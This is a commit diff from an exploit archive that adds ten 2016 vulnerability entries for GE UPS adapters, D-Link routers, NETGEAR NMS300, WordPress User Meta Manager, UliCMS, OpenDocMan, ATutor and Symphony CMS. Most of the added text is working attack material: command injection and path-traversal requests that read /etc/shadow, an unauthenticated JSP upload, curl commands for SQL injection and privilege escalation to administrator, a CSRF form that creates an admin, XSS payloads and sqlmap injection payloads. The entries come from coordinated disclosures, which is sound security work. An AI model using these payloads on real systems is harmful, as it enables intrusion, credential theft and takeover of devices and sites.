DB: 2016-02-05

10 new exploits

files.csv

@@ -35644,6 +35644,16 @@ id,file,description,date,author,platform,type,port
 39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
 39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0
 39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80
-39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,"Zhaohuan of Tencent Security",jsp,webapps,80
+39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,ZhaoHuAn,jsp,webapps,80
 39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0
 39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0
+39408,platforms/hardware/webapps/39408.txt,"GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0
+39409,platforms/hardware/webapps/39409.txt,"DLink DVG­N5402SP - Multiple Vulnerabilities",2016-02-04,"Karn Ganeshen",hardware,webapps,0
+39410,platforms/php/webapps/39410.txt,"WordPress User Meta Manager Plugin 3.4.6 - Blind SQL Injection",2016-02-04,"Panagiotis Vagenas",php,webapps,80
+39411,platforms/php/webapps/39411.txt,"WordPress User Meta Manager Plugin 3.4.6 - Privilege Escalation",2016-02-04,"Panagiotis Vagenas",php,webapps,80
+39412,platforms/hardware/webapps/39412.txt,"NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities",2016-02-04,"Pedro Ribeiro",hardware,webapps,0
+39413,platforms/php/webapps/39413.txt,"UliCMS <= v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",php,webapps,80
+39414,platforms/php/webapps/39414.txt,"OpenDocMan 1.3.4 - CSRF Vulnerability",2016-02-04,"Curesec Research Team",php,webapps,80
+39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
+39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80
+39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0

platforms/hardware/webapps/39408.txt

@@ -0,0 +1,72 @@
+# Exploit Title: [GE Industrial Solutions - UPS SNMP Adapter Command
+Injection and Clear-text Storage of Sensitive Information Vulnerabilities]
+# Discovered by: Karn Ganeshen
+# Vendor Homepage: [http://www.geindustrial.com/]
+# Versions Reported: [All SNMP/Web Interface cards with firmware version
+prior to 4.8 manufactured by GE Industrial Solutions.]
+# CVE-IDs: [CVE-2016-0861 + CVE-2016-0862]
+
+*GE Advisory: *
+http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf
+
+
+*ICS-CERT Advisory:*https://ics-cert.us-cert.gov/advisories/ICSA-16-033-02
+
+*About GE*
+
+GE is a US-based company that maintains offices in several countries around
+the world.
+
+The affected product, SNMP/Web Interface adapter, is a web server designed
+to present information about the Uninterruptible Power Supply (UPS).
+According to GE, the SNMP/Web Interface is deployed across several sectors
+including Critical Manufacturing and Energy. GE estimates that these
+products are used worldwide.
+
+*Affected Products*
+
+• All SNMP/Web Interface cards with firmware version prior to 4.8
+manufactured by GE Industrial Solutions.
+
+
+
+*VULNERABILITY OVERVIEW*
+A
+
+
+*COMMAND INJECTIONCVE-2016-0861*
+Device application services run as (root) privileged user, and does not
+perform strict input validation. This allows an authenticated user to
+execute any system commands on the system.
+
+Vulnerable function:
+http://IP/dig.asp <http://ip/dig.asp>
+
+Vulnerable parameter:
+Hostname/IP address
+
+
+*PoC:*
+In the Hostname/IP address input, enter:
+; cat /etc/shadow
+
+Output
+root:<hash>:0:0:root:/root:/bin/sh
+<...other system users...>
+ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh
+root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh
+
+B
+
+
+*CLEARTEXT STORAGE OF SENSITIVE INFORMATIONCVE-2016-0862*
+File contains sensitive account information stored in cleartext. All users,
+including non-admins, can view/access device's configuration, via Menu
+option -> Save -> Settings.
+
+The application stores all information in clear-text, including *all user
+logins and clear-text passwords*.
+-- 
+Best Regards,
+Karn Ganeshen
+ipositivesecurity.blogspot.in

platforms/hardware/webapps/39409.txt

@@ -0,0 +1,95 @@
+# Exploit Title: [DLink DVG­N5402SP Multiple Vulnerabilities]
+# Discovered by: Karn Ganeshen
+# Vendor Homepage: [www.dlink.com/]
+# Versions Reported: [Multiple - See below]
+# CVE-IDs: [CVE-2015-7245 + CVE-2015-7246 + CVE-2015-7247]
+
+
+*DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and
+Sensitive Info Leakage Vulnerabilities*
+*Vulnerable Models, Firmware, Hardware versions*
+DVG­N5402SP Web Management
+Model Name : GPN2.4P21­C­CN
+Firmware Version : W1000CN­00
+Firmware Version :W1000CN­03
+Firmware Version :W2000EN­00
+Hardware Platform :ZS
+Hardware Version :Gpn2.4P21­C_WIFI­V0.05
+
+Device can be managed through three users:
+1. super ­ full privileges
+2. admin ­ full privileges
+3. support ­ restricted user
+
+*1. Path traversal*
+Arbitrary files can be read off of the device file system. No
+authentication is required to exploit this vulnerability.
+*CVE-ID*: CVE-2015-7245
+
+*HTTP Request *
+
+POST /cgi­bin/webproc HTTP/1.1
+Host: <IP>:8080
+User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101
+Firefox/39.0 Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept­Language: en­US,en;q=0.5
+Accept­Encoding: gzip, deflate
+Referer: http://<IP>:8080/cgi­bin/webproc
+Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
+Connection: keep­alive
+Content­Type: application/x­www­form­urlencoded
+Content­Length: 223
+
+getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var%
+&obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
+
+*HTTP Response*
+
+HTTP/1.0 200 OK
+pstVal­>name:getpage; pstVal­>value:html/main.html
+pstVal­>name:getpage; pstVal­>value:html/index.html
+pstVal­>name:errorpage;
+pstVal­>value:../../../../../../../../../../../etc/shadow
+pstVal­>name:var:menu; pstVal­>value:setup
+pstVal­>name:var:page; pstVal­>value:connected
+pstVal­>name:var:subpage; pstVal­>value:­
+pstVal­>name:obj­action; pstVal­>value:auth
+pstVal­>name::username; pstVal­>value:super
+pstVal­>name::password; pstVal­>value:super
+pstVal­>name::action; pstVal­>value:login
+pstVal­>name::sessionid; pstVal­>value:1ac5da6b
+Connection: close
+Content­type: text/html
+Pragma: no­cache
+Cache­Control: no­cache
+set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT;
+path=/
+
+#root:<hash_redacted>:13796:0:99999:7:::
+root:<hash_redacted>:13796:0:99999:7:::
+#tw:<hash_redacted>:13796:0:99999:7:::
+#tw:<hash_redacted>:13796:0:99999:7:::
+
+
+*2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246
+
+The device has two system user accounts configured with default passwords
+(root:root, tw:tw).
+Login ­ tw ­ is not active though. Anyone could use the default password to
+gain administrative control through the Telnet service of the system (when
+enabled) leading to integrity, loss of confidentiality, or loss of
+availability.
+
+*3.Sensitive info leakage via device running configuration backup *
+*CVE-ID*: CVE-2015-7247
+
+Usernames, Passwords, keys, values and web account hashes (super & admin)
+are stored in clear­text and not masked. It is noted that restricted
+'support' user may also access this config backup file from the portal
+directly, gather clear-text admin creds, and gain full, unauthorized access
+to the device.
+-- 
+Best Regards,
+Karn Ganeshen
+ipositivesecurity.blogspot.in

platforms/hardware/webapps/39412.txt

@@ -0,0 +1,106 @@
+>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
+>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
+==========================================================================
+Disclosure: 04/02/2016 / Last updated: 04/02/2016
+
+
+>> Background on the affected product:
+"NMS300
+ProSAFE® Network Management System
+Diagnose, control, and optimize your network devices.
+
+The NETGEAR Management System NMS300 delivers insight into network elements, including third-party devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."
+
+
+>> Summary:
+Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. The first one is an arbitrary file upload vulnerability that allows an unauthenticated attacker to execute Java code as the SYSTEM user.
+The second vulnerability is an arbitrary file download that allows an authenticated user to download any file from the host that is running NMS300.
+
+A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released.
+
+
+>> Technical details:
+#1
+Vulnerability: Remote code execution via arbitrary file upload (unauthenticated)
+CVE-2016-1525
+Affected versions:
+NMS300 1.5.0.11
+NMS300 1.5.0.2
+NMS300 1.4.0.17
+NMS300 1.1.0.13
+
+There are two servlets that allow unauthenticated file uploads:
+@RequestMapping({ "/fileUpload.do" })
+public class FileUpload2Controller
+- Uses spring file upload
+
+@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
+public class FileUploadController
+- Uses flash upload
+
+The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension].
+So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.
+
+POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
+Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
+
+------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
+Content-Disposition: form-data; name="name"
+
+[name]
+------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
+Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]"
+Content-Type: application/octet-stream
+
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+pageEncoding="ISO-8859-1"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Hello World Example</title>
+</head>
+<body>
+<h2>A Hello World Example of JSP.</h2>
+</body>
+</html>
+------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--
+
+
+#2
+Vulnerability: Arbitrary file download (authenticated)
+CVE-2016-1524
+Affected versions:
+NMS300 1.5.0.11
+NMS300 1.5.0.2
+NMS300 1.4.0.17
+NMS300 1.1.0.13
+
+Three steps need to be taken in order to exploit this vulnerability:
+a) Add a configuration image, with the realName parameter containing the path traversal to the target file:
+POST /data/config/image.do?method=add HTTP/1.1
+realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla
+
+b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1):
+POST /data/getPage.do?method=getPageList&type=configImgManager
+everyPage=10000
+
+Sample response:
+{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}
+
+c) Download the file with the imageId obtained in step 2:
+GET /data/config/image.do?method=export&imageId=<ID>
+
+
+>> Fix: 
+No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks.
+
+
+>> References:
+[1] https://www.kb.cert.org/vuls/id/777024
+
+
+================
+Agile Information Security Limited
+http://www.agileinfosec.co.uk/
+>> Enabling secure digital business >>

platforms/php/webapps/39410.txt

@@ -0,0 +1,42 @@
+* Exploit Title: WordPress User Meta Manager Plugin [Blind SQLI]
+* Discovery Date: 2015/12/28
+* Public Disclosure Date: 2016/02/04
+* Exploit Author: Panagiotis Vagenas
+* Contact: https://twitter.com/panVagenas
+* Vendor Homepage: http://jasonlau.biz/home/
+* Software Link: https://wordpress.org/plugins/user-meta-manager/
+* Version: 3.4.6
+* Tested on: WordPress 4.4.1
+* Category: webapps
+
+Description
+================================================================================
+
+AJAX actions `umm_edit_user_meta` and `umm_delete_user_meta` of the User Meta 
+Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
+attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET 
+param.
+
+PoC
+================================================================================
+
+
+curl -c ${USER_COOKIES} \
+    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
+    &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"
+
+
+Timeline
+================================================================================
+
+2015/12/28 - Discovered
+2015/12/29 - Vendor notified via support forums in WordPress.org
+2015/12/29 - Vendor notified via contact form in his site
+2016/01/29 - WordPress security team notified about the issue
+2016/02/02 - Vendor released version 3.4.7
+2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
+
+Solution
+================================================================================
+  
+Update to version 3.4.7

platforms/php/webapps/39411.txt

@@ -0,0 +1,44 @@
+* Exploit Title: WordPress User Meta Manager Plugin [Privilege Escalation]
+* Discovery Date: 2015/12/28
+* Public Disclosure Date: 2016/02/04
+* Exploit Author: Panagiotis Vagenas
+* Contact: https://twitter.com/panVagenas
+* Vendor Homepage: http://jasonlau.biz/home/
+* Software Link: https://wordpress.org/plugins/user-meta-manager/
+* Version: 3.4.6
+* Tested on: WordPress 4.4.1
+* Category: webapps
+
+Description
+================================================================================
+
+User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege 
+escalation vulnerability. A registered user can modify the meta information of 
+any registered user, including himself. This way he can modify `wp_capabilities`
+meta to escalate his account to a full privileged administrative account.
+
+PoC
+================================================================================
+
+
+curl -c ${USER_COOKIES} \
+     -d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
+     &umm_meta_key[]=wp_capabilities" \
+    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
+    &umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"
+
+
+Timeline
+================================================================================
+
+2015/12/28 - Discovered
+2015/12/29 - Vendor notified via support forums in WordPress.org
+2015/12/29 - Vendor notified via contact form in his site
+2016/01/29 - WordPress security team notified about the issue
+2016/02/02 - Vendor released version 3.4.7
+2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
+
+Solution
+================================================================================
+  
+No official solution yet exists.

platforms/php/webapps/39413.txt

@@ -0,0 +1,87 @@
+=============================================
+MGC ALERT 2016-001
+- Original release date: January 26, 2016
+- Last revised:  February 02, 2016
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,1/10 (CVSS Base Score)
+=============================================
+
+I. VULNERABILITY
+-------------------------
+Time-based SQL Injection in Admin panel UliCMS <= v9.8.1
+
+II. BACKGROUND
+-------------------------
+UliCMS is a modern web content management solution from Germany, that
+attempts to make web content management more easier.
+
+III. DESCRIPTION
+-------------------------
+This bug was found using the portal with authentication as administrator.
+To exploit the vulnerability only is needed use the version 1.0 of the HTTP
+protocol to interact with the application.
+
+It is possible to inject SQL code in the variable "country_blacklist" on
+the page "action=spam_filter".
+
+IV. PROOF OF CONCEPT
+-------------------------
+The following URL's and parameters have been confirmed to all suffer from
+Time Based Blind SQL injection.
+
+/ulicms/admin/?action=spam_filter
+
+(POST)
+spamfilter_enabled=yes&spamfilter_words_blacklist=a&country_blacklist=ru&submit_spamfilter_settings=Save+Changes
+
+POC using SQLMap:
+
+sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter" --cookie="SET
+COOKIE HERE"
+--data="spamfilter_enabled=yes&spamfilter_words_blacklist=a&country_blacklist=ru&submit_spamfilter_settings=Save+Changes"
+-p "country_blacklist" --dbms="mysql" --dbs
+
+V. BUSINESS IMPACT
+-------------------------
+Public defacement, confidential data leakage, and database server
+compromise can result from these attacks. Client systems can also be
+targeted, and complete compromise of these client systems is also possible.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+UliCMS <= v9.8.1
+
+VII. SOLUTION
+-------------------------
+Install vendor patch.
+
+VIII. REFERENCES
+-------------------------
+http://en.ulicms.de/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+January 26, 2016 1: Initial release
+February 02, 2015 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
+January 26, 2016 2: Send to vendor
+January 28, 2016 3: Vendor fix vulnerability
+February 02, 2016 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester

platforms/php/webapps/39414.txt

@@ -0,0 +1,82 @@
+Security Advisory - Curesec Research Team
+
+1. Introduction
+
+Affected Product:    Opendocman 1.3.4
+Fixed in:            1.3.5
+Fixed Version Link:  http://www.opendocman.com/free-download/
+Vendor Website:      http://www.opendocman.com/
+Vulnerability Type:  CSRF
+Remote Exploitable:  Yes
+Reported to vendor:  11/21/2015
+Disclosed to public: 02/01/2016
+Release mode:        Coordinated Release
+CVE:                 n/a
+Credits              Tim Coen of Curesec GmbH
+
+2. Overview
+
+CVSS
+
+Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
+
+Description
+
+Opendocman does not have CSRF protection, which means that an attacker can
+perform actions for an admin, if the admin visits an attacker controlled
+website while logged in.
+
+3. Proof of Concept
+
+Add new Admin User:
+
+    <html>
+      <body>
+        <form action="http://localhost/opendocman-1.3.4/user.php" method="POST" enctype="multipart/form-data">
+          <input type="hidden" name="last&#95;name" value="test" />
+          <input type="hidden" name="first&#95;name" value="test" />
+          <input type="hidden" name="username" value="test" />
+          <input type="hidden" name="phonenumber" value="1214532" />
+          <input type="hidden" name="password" value="12345678" />
+          <input type="hidden" name="Email" value="test&#64;example&#46;com" />
+          <input type="hidden" name="department" value="1" />
+          <input type="hidden" name="admin" value="1" />
+          <input type="hidden" name="can&#95;add" value="1" />
+          <input type="hidden" name="can&#95;checkin" value="1" />
+          <input type="hidden" name="submit" value="Add&#32;User" />
+          <input type="submit" value="Submit request" />
+        </form>
+      </body>
+    </html>
+
+
+4. Solution
+
+To mitigate this issue please upgrade at least to version 1.3.5:
+
+http://www.opendocman.com/free-download/
+
+Please note that a newer version might already be available.
+
+5. Report Timeline
+
+11/21/2015 Informed Vendor about Issue (no reply)
+12/10/2015 Reminded Vendor of disclosure date
+12/19/2015 Vendor sends fix for CSRF for verification
+01/13/2016 Confirmed CSRF fix
+01/20/2016 Vendor requests more time to fix other issues in same version
+01/31/2016 Vendor releases fix
+02/01/2015 Disclosed to public
+
+
+Blog Reference:
+https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html
+ 
+--
+blog:  https://blog.curesec.com
+tweet: https://twitter.com/curesec
+
+Curesec GmbH
+Curesec Research Team
+Romain-Rolland-Str 14-24
+13089 Berlin, Germany

platforms/php/webapps/39415.txt

@@ -0,0 +1,164 @@
+Security Advisory - Curesec Research Team
+
+1. Introduction
+
+Affected Product:    Atutor 2.2
+Fixed in:            partly in ATutor 2.2.1-RC1, complete in 2.2.1
+Fixed Version Link:  http://www.atutor.ca/atutor/download.php
+Vendor Website:      http://www.atutor.ca/
+Vulnerability Type:  XSS
+Remote Exploitable:  Yes
+Reported to vendor:  11/17/2015
+Disclosed to public: 02/01/2016
+Release mode:        Coordinated Release
+CVE:                 n/a
+Credits              Tim Coen of Curesec GmbH
+
+2. Overview
+
+Atutor is a learning management system (LMS) written in PHP. In version 2.2, it
+is vulnerable to multiple reflected and persistent XSS attacks.
+
+The vulnerabilities can lead to the stealing of cookies, injection of
+keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a
+successful exploitation can lead to code execution via the theme uploader, and
+if the victim is an instructor, this can lead to code execution via a file
+upload vulnerability in the same version of Atutor.
+
+3. Details
+
+XSS 1: Reflected XSS - Calendar
+
+CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
+
+Description: The calendar_next parameter of the calendar is vulnerable to XSS.
+This issue has been fixed in ATutor 2.2.1-RC1.
+
+Proof of Concept:
+
+    http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next<script>alert(1)<%2fscript>&pub=1
+
+Code:
+
+    /mods/_standard/calendar/getlanguage.php
+    $token = $_GET['token'];
+    echo _AT($token);
+
+XSS 2: Persistent XSS - Profile
+
+CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
+
+Description: When saving profile information, < is filtered out. < on the
+other hand is not filtered, but converted to <, which leads to persistent XSS.
+
+A user account is needed, but registration is open by default. This issue has
+been fixed in ATutor 2.2.1.
+
+Proof of Concept:
+
+Visit: 
+    http://localhost/ATutor/users/profile.php 
+In any field, enter 
+    <img src=no onerror=alert(1)>
+
+The input is for example echoed when visiting http://localhost/ATutor/users/
+profile.php. This self-XSS may be exploited by force-logging in the victim.
+
+The input is not only echoed to the user themselves, but also in other places.
+
+For example, an attacker could send a private message to a victim. When the
+victim views the message, or visits their inbox, the injected code will be
+executed.
+
+XSS 3: Persistent XSS - Forum
+
+CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
+
+Description: When creating a forum post, the Subject parameter is vulnerable to
+persistent XSS.
+
+A user account is needed, but registration is open by default. This issue has
+been fixed in ATutor 2.2.1.
+
+Proof of Concept:
+
+Visit a forum, eg here: 
+    http://localhost/ATutor/mods/_standard/forums/forum/view.php?fid=1&pid=1 
+Post a new message, as Subject, use: 
+    Re: test topic'"><img src=no onerror=alert(1)>
+
+In ATutor 2.2.1-RC1, < and > are encoded, preventing the proof of concept from
+working. But until version 2.2.1, it was still possible to exploit this issue
+either by using the JavaScript context the input is echoed into (onClick), or
+by adding a new attribute:
+
+adding new attributes: 
+    Re: ';" onmouseover="alert(1); var foo=' 
+staying inside the existing JavaScript context: 
+    Re: test topic';alert(1);var foo='
+
+XSS 4: Persistent self-XSS - Calendar
+
+CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
+
+Description: The event name of the calendar is vulnerable to persistent XSS.
+The calendar seems to be shown only to the user creating it, meaning the only
+way to exploit this issue would be to force-login the victim.
+
+A user account is needed, but registration is open by default. This issue has
+been fixed in ATutor 2.2.1-RC1.
+
+Proof of Concept:
+
+Visit: http://localhost/ATutor/mods/_standard/calendar/index_mystart.php 
+Create event with name: 
+    '"><img src=no onerror=alert(1)> 
+Visit event page: http://localhost/ATutor/mods/_standard/calendar/index_mystart.php
+
+XSS 5: Persistent XSS - Chat
+
+CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
+
+Description: When viewing the chat history, chat messages are not properly HTML
+encoded, leading to persistent XSS.
+
+A user account is needed, but registration is open by default. This issue has
+been fixed in ATutor 2.2.1-RC1.
+
+Proof of Concept:
+
+1. Visit Chat: 
+    http://localhost/ATutor/mods/_standard/chat/chat.php 
+2. Enter chat message: 
+    '"><img src=no onerror=alert(1)> 
+3. Visit chat history of that user: 
+    http://localhost/ATutor/mods/_standard/chat/filterHistory.php?filterChatID=[USERNAME]
+
+4. Solution
+
+To mitigate this issue please upgrade at least to version 2.2.1:
+
+http://www.atutor.ca/atutor/download.php
+
+Please note that a newer version might already be available.
+
+5. Report Timeline
+
+11/17/2015 Informed Vendor about Issue
+11/21/2015 Vendor requests more time
+01/06/2016 Vendor releases new release candidate with partial fix
+01/30/2016 Vendor releases complete fix
+02/01/2016 Disclosed to public
+
+
+Blog Reference:
+https://blog.curesec.com/article/blog/Atutor-22-XSS-149.html
+ 
+--
+blog:  https://blog.curesec.com
+tweet: https://twitter.com/curesec
+
+Curesec GmbH
+Curesec Research Team
+Romain-Rolland-Str 14-24
+13089 Berlin, Germany

platforms/php/webapps/39416.txt

@@ -0,0 +1,131 @@
+================================================================
+Symphony CMS 2.6.3 – Multiple SQL Injection Vulnerabilities
+================================================================
+
+Information
+================================================================
+Vulnerability Type : Multiple SQL Injection Vulnerabilities
+Vendor Homepage: http://www.getsymphony.com/
+Vulnerable Version:Symphony CMS 2.6.3
+Fixed Version :Symphony CMS 2.6.5
+Severity: High
+Author – Sachin Wagh (@tiger_tigerboy)
+
+Description
+================================================================
+
+The vulnerability is located in the 'fields[username]','action[save]' and
+'fields[email]' of the '/symphony/system/authors/new/' page.
+
+Proof of Concept
+================================================================
+*1. fields[username] (POST)*
+
+Parameter: fields[username] (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload:
+xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-6697'
+OR 7462=7462#&fields[user_type]=author&fields[password]=sach
+in&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
+Author
+
+    Type: error-based
+    Title: MySQL OR error-based - WHERE or HAVING clause
+    Payload:
+xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=-8105'
+OR 1 GROUP BY CONCAT(0x71767a7871,(SELECT (CASE WHEN (1004=1
+004) THEN 1 ELSE 0 END)),0x716b7a6271,FLOOR(RAND(0)*2)) HAVING
+MIN(0)#&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_a
+rea]=3&action[save]=Create Author
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind (comment)
+    Payload:
+xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=sachin&fields[username]=sachin123'
+OR SLEEP(5)#&fields[user_type]=author&fields[password]=s
+achin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
+Author
+---
+[14:09:41] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows
+web application technology: Apache 2.4.12, PHP 5.5.27
+back-end DBMS: MySQL 5.0.12
+
+*2. fields[email] (POST)*
+
+Parameter: fields[email] (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload:
+xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
+sachin12@mail.com' AND 4852=4852 AND
+'dqXl'='dqXl&fields[username]=sachinnn123&fields[user
+type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
+Author
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause
+    Payload:
+xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
+sachin12@mail.com' AND (SELECT 8298 FROM(SELECT
+COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(
+298=8298,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
+'Pmvq'='Pmvq&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[
+assword-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
+Author
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
+    Payload:
+xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
+sachin12@mail.com' AND (SELECT * FROM (SELECT(SLEEP(5)))xIxY) AND
+'hKvH'='hKvH&fields[user
+ame]=sachinnn123&fields[user_type]=author&fields[password]=sachin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
+Author
+
+*3. action[save] (POST)*
+
+Parameter: action[save] (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload:
+xsrf=tsQYrHSsj7iDQFfZcfAcBMiWImQ&fields[first_name]=sachin&fields[last_name]=sachin&fields[email]=
+sachin12@mail.com
+&fields[username]=sachinnn123&fields[user_type]=author&fields[password]=sa
+chin&fields[password-confirmation]=sachin&fields[auth_token_active]=no&fields[default_area]=3&action[save]=Create
+Author%' AND 8836=8836 AND '%'='
+
+---
+[12:23:44] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows
+web application technology: Apache 2.4.12, PHP 5.5.27
